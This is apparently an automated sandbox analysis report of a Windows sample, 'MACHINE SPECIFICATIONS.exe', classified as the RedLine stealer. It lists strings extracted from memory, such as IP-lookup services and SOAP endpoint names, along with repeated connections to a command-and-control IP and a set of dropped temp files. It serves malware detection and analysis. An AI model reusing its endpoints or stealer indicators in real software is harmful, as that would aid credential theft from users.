Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://forms.rea
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://service.r
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://support.a
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364530309.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364614327.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364530309.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364788039.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364788039.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364344972.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/t_
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://get.adob
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://helpx.ad
Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: MACHINE SPECIFICATIONS.exe, 00000003.00000002.364934523.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.365087226.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000003.00000002.364827215.0000000003018000.00000004.00000800.00020000.00000000.sdmp, tmp133B.tmp.3.dr, tmp7E99.tmp.3.dr, tmp447D.tmp.3.dr, tmp8272.tmp.3.dr, tmp81A6.tmp.3.dr, tmpC4DB.tmp.3.dr, tmpDA96.tmp.3.dr, tmp3E83.tmp.3.dr, tmpBD2A.tmp.3.dr, tmp989B.tmp.3.dr, tmp49BD.tmp.3.dr, tmp570.tmp.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MACHINE SPECIFICATIONS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MACHINE SPECIFICATIONS.exe.log

C:\Users\user\AppData\Local\Temp\tmp133B.tmp

C:\Users\user\AppData\Local\Temp\tmp3E83.tmp

C:\Users\user\AppData\Local\Temp\tmp4163.tmp

C:\Users\user\AppData\Local\Temp\tmp447D.tmp

C:\Users\user\AppData\Local\Temp\tmp49BD.tmp

C:\Users\user\AppData\Local\Temp\tmp570.tmp

C:\Users\user\AppData\Local\Temp\tmp57EA.tmp

C:\Users\user\AppData\Local\Temp\tmp7E99.tmp

C:\Users\user\AppData\Local\Temp\tmp81A6.tmp

C:\Users\user\AppData\Local\Temp\tmp8272.tmp

C:\Users\user\AppData\Local\Temp\tmp989B.tmp

C:\Users\user\AppData\Local\Temp\tmpA773.tmp

C:\Users\user\AppData\Local\Temp\tmpAC7D.tmp

C:\Users\user\AppData\Local\Temp\tmpAD49.tmp

C:\Users\user\AppData\Local\Temp\tmpAE15.tmp

Windows Analysis Report
MACHINE SPECIFICATIONS.exe